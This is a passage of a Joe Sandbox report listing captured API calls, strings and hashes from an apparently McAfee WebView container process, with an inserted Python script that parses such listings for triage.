                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AtomGlobal$DeleteErrorLast
                                • String ID: WebViewContainerAppName
                                • API String ID: 3166071000-1640168891
                                • Opcode ID: a29dc4d45c3eeb9e46eaf7265e19f626ce4c7e2773da92cf50373c4b5ec942c4
                                • Instruction ID: f731f322c338ac36118a90c5995feec08c7d72957bdfb2e9337e05cec2f4cb14
                                • Opcode Fuzzy Hash: a29dc4d45c3eeb9e46eaf7265e19f626ce4c7e2773da92cf50373c4b5ec942c4
                                • Instruction Fuzzy Hash: 17F06D79140609DBDB51AB95FC08B7777A8BB50361F41C126FA88DB060D7BAC8B0DB78
                                APIs
                                • __alloca_probe_16.LIBCMT ref: 00432CBC
                                • __alloca_probe_16.LIBCMT ref: 00432D7D
                                • __freea.LIBCMT ref: 00432DE4
                                  • Part of subcall function 0043023B: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0043026D
                                • __freea.LIBCMT ref: 00432DF9
                                • __freea.LIBCMT ref: 00432E09
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                • String ID:
                                • API String ID: 1423051803-0
                                • Opcode ID: 69a5eba164a3dd2779e53ff7e74a4366de8de3fe2be9096bd272c75b99f82cff
                                • Instruction ID: e742e182d1483abe86c7713669577c90f4501bd5df134f5f19e2308596e2f50e
                                • Opcode Fuzzy Hash: 69a5eba164a3dd2779e53ff7e74a4366de8de3fe2be9096bd272c75b99f82cff
                                • Instruction Fuzzy Hash: 9751C472600116AFEB209E66DD82EBF36A9EF08354F25112AFC04D7210EAB8CD118769
                                APIs
                                • GetLastError.KERNEL32(?,?,?,00000000,00000000,A05DD77D), ref: 0041EB9B
                                • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,02000000,00000000), ref: 0041EC50
                                • CloseHandle.KERNEL32(00000000), ref: 0041ECAC
                                • GetLastError.KERNEL32 ref: 0041ECDF
                                • GetLastError.KERNEL32 ref: 0041ED06
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLast$CloseCreateFileHandle
                                • String ID:
                                • API String ID: 614986841-0
                                • Opcode ID: 8634cc2be035cbb0032fdaf12e36042523111876e64471be8bd27d29ec06f0ea
                                • Instruction ID: 7bfc1930e99ba8f9af3a77fc4d727bd5bf6da214558acfc95d8b0d15a51b7a9f
                                • Opcode Fuzzy Hash: 8634cc2be035cbb0032fdaf12e36042523111876e64471be8bd27d29ec06f0ea
                                • Instruction Fuzzy Hash: 2951A3B49013059FD7208F56DC48B9ABBF4FB04714F1084AEE95A97390E7B89984CF59
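The entries above record, per executed function, the resolved imports, the argument values the sandbox captured, and the call-site address. As an added example, not part of the Joe Sandbox report and not a Joe Sandbox API, the following Python parses "APIs" lines of this form, groups them per function block, collects the literal string arguments the sandbox resolved ("#32770", "WebViewContainerAppName", "mscoree.dll", "CorExitProcess"), and names the numeric CreateFileW parameters from their documented Win32 values, so the call at 0041EC50 reads as GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_DELETE, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS. The sample input is constructed by copying lines from this page; the regular expression and the constant tables are my own assumptions about the listing format.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: "APIs" lines copied from the Joe Sandbox listing on this page.
SAMPLE = """\
APIs
• GetLastError.KERNEL32(?,?,?,00000000,00000000,A05DD77D), ref: 0041EB9B
• CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,02000000,00000000), ref: 0041EC50
• CloseHandle.KERNEL32(00000000), ref: 0041ECAC
• GetLastError.KERNEL32 ref: 0041ECDF
APIs
• FindWindowExW.USER32(00000000,00000000,#32770,00000000), ref: 003F2A2B
• GetPropW.USER32(00000000,WebViewContainerAppName), ref: 003F2A39
• GlobalGetAtomNameW.KERNEL32(00000000,?,00000104), ref: 003F2A50
APIs
• __alloca_probe_16.LIBCMT ref: 00432CBC
  • Part of subcall function 0043023B: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0043026D
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A05DD77D,?,?,00000000,0043A5B0,000000FF,?,0042EC3A,00000002,eB,0042EC0E,eB), ref: 0042EC9C
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042ECAE
"""

# Assumed shape of one API line: "• [Part of subcall function XXXXXXXX: ]Name.MODULE[(args)], ref: XXXXXXXX"
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX_RE = re.compile(r"^[0-9A-F]{8}$")


@dataclass
class Call:
    api: str
    module: str
    args: list                       # raw argument tokens; "?" means the sandbox did not resolve it
    ref: str                         # call-site address in the dumped image
    subcall_of: Optional[str] = None # address of the callee when the line is a "Part of subcall"


def parse_args(raw: Optional[str]) -> list:
    return [a.strip() for a in raw.split(",")] if raw else []


def parse_api_listing(text: str) -> list:
    """Split the listing into blocks, one per "APIs" header, each a list of Call records."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        m = LINE_RE.match(line)
        if m is None or current is None:
            continue  # "Strings", "Memory Dump Source" and other non-API lines are ignored
        current.append(Call(m["api"], m["mod"], parse_args(m["args"]), m["ref"], m["sub"]))
    return blocks


def arg_int(token: str) -> Optional[int]:
    return int(token, 16) if HEX_RE.match(token) else None


def flag_names(value: int, table: dict) -> list:
    names = [name for bit, name in table.items() if value & bit]
    return names or ["0"]


# Documented Win32 constants for the CreateFileW parameters decoded below.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS = {0x80000000: "FILE_FLAG_WRITE_THROUGH", 0x40000000: "FILE_FLAG_OVERLAPPED",
         0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
         0x00000080: "FILE_ATTRIBUTE_NORMAL"}


def decode_createfile(call: Call) -> dict:
    """Name the numeric CreateFileW parameters (positions 1, 2, 4 and 5 of its 7 arguments)."""
    if call.api != "CreateFileW" or len(call.args) != 7:
        raise ValueError("not a CreateFileW call with 7 arguments")
    access, share, disp, flags = (arg_int(call.args[i]) for i in (1, 2, 4, 5))
    return {
        "access": flag_names(access, ACCESS) if access is not None else ["?"],
        "share": flag_names(share, SHARE) if share is not None else ["?"],
        "disposition": DISPOSITION.get(disp, "?"),
        "flags": flag_names(flags, FLAGS) if flags is not None else ["?"],
    }


def module_histogram(blocks: list) -> Counter:
    """How many captured calls target each module (KERNEL32, USER32, ...)."""
    return Counter(c.module for b in blocks for c in b)


def string_args(blocks: list) -> set:
    """Literal string arguments the sandbox resolved: anything that is neither a hex word nor '?'."""
    return {a for b in blocks for c in b for a in c.args if a and a != "?" and not HEX_RE.match(a)}


if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE)
    print("modules:", dict(module_histogram(parsed)))
    print("strings:", sorted(string_args(parsed)))
    for block in parsed:
        for call in block:
            if call.api == "CreateFileW":
                print(call.ref, decode_createfile(call))
```

Run against a whole exported report, the module histogram and the string set give a quick triage view of what the dumped image touches (window enumeration via USER32, the CRT's CorExitProcess lookup in mscoree.dll, file reads with backup semantics) before any of the fuzzy hashes are compared.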
                                APIs
                                • SysFreeString.OLEAUT32(00000000), ref: 003F3D50
                                • VariantClear.OLEAUT32(?), ref: 003F3D7A
                                • SysAllocString.OLEAUT32(?), ref: 003F3D96
                                • VariantInit.OLEAUT32(?), ref: 003F3DE4
                                • VariantClear.OLEAUT32(?), ref: 003F3E32
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$ClearString$AllocFreeInit
                                • String ID:
                                • API String ID: 695394290-0
                                • Opcode ID: 872f689b4f0084a56579b28d001137ff34785ca4a72967cb18021a21e6b53ccf
                                • Instruction ID: 414d438a7c6233382f34d26888efa5137ae14eab16ab33deb35018ab434d73d6
                                • Opcode Fuzzy Hash: 872f689b4f0084a56579b28d001137ff34785ca4a72967cb18021a21e6b53ccf
                                • Instruction Fuzzy Hash: 99416C759002599FCB11DFA9C804BAEBBF8FF48720F10866AFD15E7350E775AA108B94
                                APIs
                                • SetLastError.KERNEL32(00000000), ref: 003F1A21
                                • MapWindowPoints.USER32(000701F0,00000000,?,00000001), ref: 003F1A38
                                • GetLastError.KERNEL32 ref: 003F1A42
                                • SetWindowPos.USER32(000701F0,00000000,?,?,00000000,00000000,00000005), ref: 003F1A6D
                                • UpdateWindow.USER32(000701F0), ref: 003F1A78
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Window$ErrorLast$PointsUpdate
                                • String ID:
                                • API String ID: 3689522800-0
                                • Opcode ID: 9dc0050f130e60fee7c19759e86ed600fae5d6dce2fb5ba9406a61057315a4ea
                                • Instruction ID: af33f114cbe5495fb11b0ab00fdacaf98e57474062a8023dfa38ace353135fa6
                                • Opcode Fuzzy Hash: 9dc0050f130e60fee7c19759e86ed600fae5d6dce2fb5ba9406a61057315a4ea
                                • Instruction Fuzzy Hash: 0E21E632B112089BDB18AB69EC46B7E7769EB45710F45823AEA00EF2C0DA709C4087A4
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 003EEF8A
                                • VariantChangeType.OLEAUT32(00000000,?,00000000,00000016), ref: 003EEFB2
                                • VariantClear.OLEAUT32(00000000), ref: 003EEFC3
                                • _com_issue_error.COMSUPP ref: 003EEFE6
                                • VariantClear.OLEAUT32 ref: 003EEFF1
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$Clear$ChangeInitType_com_issue_error
                                • String ID:
                                • API String ID: 1212853886-0
                                • Opcode ID: 5ecd299c4ce41e0ecbeac9e21b21b963b17db2624a96bf27ce84fe606815ee3b
                                • Instruction ID: e917be332f313c1c6a240bd6431aab7dd30bf0f625ae27ae6d53840eaae03aa8
                                • Opcode Fuzzy Hash: 5ecd299c4ce41e0ecbeac9e21b21b963b17db2624a96bf27ce84fe606815ee3b
                                • Instruction Fuzzy Hash: 5E1182719002699BCF11DFA5DC09BEEB7B8FB08710F11066AF906E3280E778A9008B54
                                APIs
                                • RtlEnterCriticalSection.NTDLL(00464694), ref: 00425D09
                                • RtlLeaveCriticalSection.NTDLL(00464694), ref: 00425D3C
                                • RtlWakeAllConditionVariable.NTDLL ref: 00425DB3
                                • SetEvent.KERNEL32(?,00468BFC,00000000), ref: 00425DBD
                                • ResetEvent.KERNEL32(?,00468BFC,00000000), ref: 00425DC9
                                Similarity
                                • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                • String ID:
                                • API String ID: 3916383385-0
                                • Opcode ID: a4d7bf17308a6932b9b0123d5e586d96897f9aeae6bc94f5ae367e7565c17200
                                • Instruction ID: f47f689fa3752821764c6dd8cb8a8123b7c86147cbdeb28ab0ced11fdb5eca25
                                • Opcode Fuzzy Hash: a4d7bf17308a6932b9b0123d5e586d96897f9aeae6bc94f5ae367e7565c17200
                                • Instruction Fuzzy Hash: 45016935604620DBCB40AF58FC489D93BA5EB4B321701403AE98683320DBBA1850CB9E
                                APIs
                                • FreeLibrary.KERNEL32(?,?,?,?,?,0043C8A0,000000FF), ref: 0040D496
                                Strings
                                Similarity
                                • API ID: FreeLibrary
                                • String ID: gfff$gfff
                                • API String ID: 3664257935-3084402119
                                • Opcode ID: 65b6dacbda685d9c02bc02ce79e6de3c895264d81f6649f8fa1f63dbc275bed8
                                • Instruction ID: 3e3ede0adb91e5c4c5c10ef56fe66979b5266e33e24a133606173c6da68c702f
                                • Opcode Fuzzy Hash: 65b6dacbda685d9c02bc02ce79e6de3c895264d81f6649f8fa1f63dbc275bed8
                                • Instruction Fuzzy Hash: C3A1D071A009019BE71CCF68D998B6AB7A5FF45314F14422EE41AC7BD0D738F964CB88
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 003E68E2
                                • IsDebuggerPresent.KERNEL32 ref: 003E69EC
                                • OutputDebugStringW.KERNEL32(00000000), ref: 003E6A78
                                Strings
                                Similarity
                                • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                • String ID: wil
                                • API String ID: 4268342597-1589926490
                                • Opcode ID: bd77af5e1b1f97c336e87d1976f8b351dc962baa5fc393ed48c4670262048c09
                                • Instruction ID: 69057e2ce34c678108e7a59efbd7621c365bb08abb40bf2afa19a24bd27b80fa
                                • Opcode Fuzzy Hash: bd77af5e1b1f97c336e87d1976f8b351dc962baa5fc393ed48c4670262048c09
                                • Instruction Fuzzy Hash: D471BFB0D042A99BDB25CF66DC417E9B7F4BB19344F0442E9E409A32E1EB709E84CF55
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 003E5B07
                                • IsDebuggerPresent.KERNEL32 ref: 003E5C2D
                                • OutputDebugStringW.KERNEL32(00000000), ref: 003E5CB9
                                Strings
                                • E:\B\T\d30760c8-f36a-4525-bc41-ffb9fa48b740\McWebViewContainer\packages\Microsoft.Windows.ImplementationLibrary.1.0.220201.1\include\wil\resource.h, xrefs: 003E5B3F
                                Similarity
                                • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                • String ID: E:\B\T\d30760c8-f36a-4525-bc41-ffb9fa48b740\McWebViewContainer\packages\Microsoft.Windows.ImplementationLibrary.1.0.220201.1\include\wil\resource.h
                                • API String ID: 4268342597-2755879635
                                • Opcode ID: 3bcd7ff38c0f0caa38754b5a0440f45b959debd42521bd1dfdc8464b4b45992a
                                • Instruction ID: 7fc05a31c4b371fe0ac500e3f8e09489b96a814073ddd13671f1151444b63737
                                • Opcode Fuzzy Hash: 3bcd7ff38c0f0caa38754b5a0440f45b959debd42521bd1dfdc8464b4b45992a
                                • Instruction Fuzzy Hash: EE717DB09007A99BDB25CF65CC407D9B7F8AB09308F1446E9E409E32E1E7749AC4CF62
                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 003F6043
                                • __Cnd_destroy_in_situ.LIBCPMT ref: 003F607B
                                • __Mtx_destroy_in_situ.LIBCPMT ref: 003F6084
                                Strings
                                Similarity
                                • API ID: Cnd_destroy_in_situConcurrency::cancel_current_taskMtx_destroy_in_situ
                                • String ID: P`?
                                • API String ID: 3272402957-1080471864
                                • Opcode ID: 44a94d76672ee20fba1cabc7053207d8716def74b84213f7f030b4e7cd71e2e1
                                • Instruction ID: 50ac9da0f7f4d9e2e778fa5fc659b29988868c3309b599b367e95d1e319b1461
                                • Opcode Fuzzy Hash: 44a94d76672ee20fba1cabc7053207d8716def74b84213f7f030b4e7cd71e2e1
                                • Instruction Fuzzy Hash: 27518771B047088BD725DE78A882A3AB3E8EF40310F64063EF652C7782DB75D9448791
                                APIs
                                Strings
                                • failed to initialize COM, xrefs: 00408316
                                Similarity
                                • API ID: CurrentThread$CloseHandle
                                • String ID: failed to initialize COM
                                • API String ID: 1930902833-2564502714
                                • Opcode ID: 75f386daee651d70121c4cc12fe4726ee70a4fae55fb0bd7af8b2a4d0eb73c40
                                • Instruction ID: 75256f8ddee4319e6a130c82454efd00c60d865174c68bf7a6c10194aca821bd
                                • Opcode Fuzzy Hash: 75f386daee651d70121c4cc12fe4726ee70a4fae55fb0bd7af8b2a4d0eb73c40
                                • Instruction Fuzzy Hash: A7519E71D006089FDB10DFA4C945BEEBBF4FF58704F20812EE905AB291EB795A48CB95
                                APIs
                                Strings
                                • C:\jenkins\workspace\sumer_Cardinal_aviary-sdk_master\src\trust\lib\trust_impl.cpp, xrefs: 00412B7D
                                • failed to get exported function '%hs', xrefs: 00412B3F
                                Similarity
                                • API ID: AddressErrorLastProc
                                • String ID: C:\jenkins\workspace\sumer_Cardinal_aviary-sdk_master\src\trust\lib\trust_impl.cpp$failed to get exported function '%hs'
                                • API String ID: 199729137-3740449315
                                • Opcode ID: f6ce1fd7f25fbd92de7f5bc38c9daef9e4d57a828d899a1ad96faea07e254fa1
                                • Instruction ID: becbe6e2c98614305e341a5cb413f5a6f5e46a401238c6c5f897a16bfe553bf3
                                • Opcode Fuzzy Hash: f6ce1fd7f25fbd92de7f5bc38c9daef9e4d57a828d899a1ad96faea07e254fa1
                                • Instruction Fuzzy Hash: D341E370E01209AFDF04CFA9D9457DEBBB1FF45314F10816AE810AB381E7B8A954CB98
                                APIs
                                • SysStringLen.OLEAUT32(?), ref: 003EDBB5
                                • SysStringLen.OLEAUT32(00000000), ref: 003EDBBD
                                  • Part of subcall function 003EDD10: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003EDCD8
                                Strings
                                Similarity
                                • API ID: String$Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: ICommunicator::send_message$framework
                                • API String ID: 3379692669-3514916642
                                • Opcode ID: 2ca5daca235b5c910801b52a92d334b0d27b8c6a725a456a6e9a04b32df34cdd
                                • Instruction ID: ac26333c02a4588a0b4bf3a34708718d5f82509611166e53865892d18e47fbb4
                                • Opcode Fuzzy Hash: 2ca5daca235b5c910801b52a92d334b0d27b8c6a725a456a6e9a04b32df34cdd
                                • Instruction Fuzzy Hash: 3741F270D042A8EFDF12DBA5D945BDEBBB5EF09304F24425AE80577381E7B51900CBA5
                                APIs
                                • QueryUnbiasedInterruptTime.KERNEL32(?,A05DD77D), ref: 00411683
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004116EC
                                Strings
                                Similarity
                                • API ID: InterruptQueryTimeUnbiasedUnothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: trust$validate_file
                                • API String ID: 2902542638-769455193
                                • Opcode ID: f94cc39cfc9bcd90f01ee91de3d780d901d72be70d17f317c0f790f8f1ebf863
                                • Instruction ID: 5592916590ab040cd813bf140895a0c7f09d648d12c345a200b905d046d790a8
                                • Opcode Fuzzy Hash: f94cc39cfc9bcd90f01ee91de3d780d901d72be70d17f317c0f790f8f1ebf863
                                • Instruction Fuzzy Hash: 1141B931E00208AFCB14CFA9D984E9EBBF5EF4A710F10852AF515A73A1E735A850CB58
                                APIs
                                • FindMITargetTypeInstance.LIBVCRUNTIME ref: 0043A4B9
                                • PMDtoOffset.LIBCMT ref: 0043A4DF
                                Strings
                                Similarity
                                • API ID: FindInstanceOffsetTargetType
                                • String ID: Bad dynamic_cast!
                                • API String ID: 2363274979-2956939130
                                • Opcode ID: 4164884a34979ff2bd11579d28e83fcd955ee1d1dfaac7c3f42eab862466ede4
                                • Instruction ID: 8b1297ff43ea39998ac4278e29afe322d639ca0f2bb3670cdb0fe5edd3029484
                                • Opcode Fuzzy Hash: 4164884a34979ff2bd11579d28e83fcd955ee1d1dfaac7c3f42eab862466ede4
                                • Instruction Fuzzy Hash: C7212931A40205EFCF04DF64C80696E7774FB98314F20921FEC5597281E738ED11879A
                                APIs
                                  • Part of subcall function 00427210: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00460EFC,00000017,0042372F,?,004589A4,?), ref: 00427270
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E72BF
                                Strings
                                Similarity
                                • API ID: ExceptionRaise___std_exception_copy
                                • String ID: 0q>$0q>$@ >
                                • API String ID: 3109751735-3163198155
                                • Opcode ID: f247eb23821a48771381be2656223ef60e67b6e9e3b052128662fe558fc26af8
                                • Instruction ID: e1f6172a61cda98705fdde0f35e9d9f8386db5230a60a4a2ab38e73906224bd3
                                • Opcode Fuzzy Hash: f247eb23821a48771381be2656223ef60e67b6e9e3b052128662fe558fc26af8
                                • Instruction Fuzzy Hash: 90018FB2600709AFC301EFA5D841886F7ECFF593107108A2BF62887651FB74E528CB98
                                APIs
                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 003E37E9
                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 003E381A
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 003E3838
                                Strings
                                Similarity
                                • API ID: FreeHeap$___std_exception_destroy
                                • String ID: @ >
                                • API String ID: 2050543389-3678301659
                                • Opcode ID: 5fa7e72d57e2b0e1ed13cc7664bcc5859c4b125160482bea402f1c222902df3a
                                • Instruction ID: 33b60d6fee8d6c67478ffddcf7997e8f57f31b0a37e944b96b470843a17fcc3c
                                • Opcode Fuzzy Hash: 5fa7e72d57e2b0e1ed13cc7664bcc5859c4b125160482bea402f1c222902df3a
                                • Instruction Fuzzy Hash: 3F1104B5601716ABE7109F26EC48B12BB68FF42325F114228F60087690D7B8FC28CBE0
                                APIs
                                • SetLastError.KERNEL32(00000000,00000000,?,00411CDE,00000000,00000000,0000003C,0000000F,A05DD77D,?,000000A8), ref: 003FE800
                                • LoadLibraryW.KERNEL32 ref: 003FE817
                                • GetLastError.KERNEL32 ref: 003FE82C
                                Strings
                                Similarity
                                • API ID: ErrorLast$LibraryLoad
                                • String ID: `F
                                • API String ID: 1136134869-510860190
                                • Opcode ID: 02fbe770a4ac2aa8b23c5c59aa6e5085aec8f34126d19a1e892c7792ea2694f1
                                • Instruction ID: 858c2c246f4d39a708d822f308bc4982e9749b720751373080d25441086fd49e
                                • Opcode Fuzzy Hash: 02fbe770a4ac2aa8b23c5c59aa6e5085aec8f34126d19a1e892c7792ea2694f1
                                • Instruction Fuzzy Hash: 9C115A712047518FD360DF1DE808756BBE4EB85B15F15847EE599C7660D3B8E888CBA0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Cnd_broadcastCurrentMtx_unlockThread
                                • String ID: 0@F
                                • API String ID: 2021000804-3035404066
                                • Opcode ID: bdf9f7690fb5a3299c830190ccfff93e47a9427776f5e8f933d065b1cc046307
                                • Instruction ID: 3610079e00c21cd2b0de95d1b9184f3cd789ea88e03aa853727036e2a8390633
                                • Opcode Fuzzy Hash: bdf9f7690fb5a3299c830190ccfff93e47a9427776f5e8f933d065b1cc046307
                                • Instruction Fuzzy Hash: 8301F935710B228BDB14AB56E4506ABB3A5EFC0358F91442FD41557301D738EC00C798
                                APIs
                                • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 003FE758
                                • LoadLibraryW.KERNEL32 ref: 003FE76F
                                • GetLastError.KERNEL32 ref: 003FE784
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
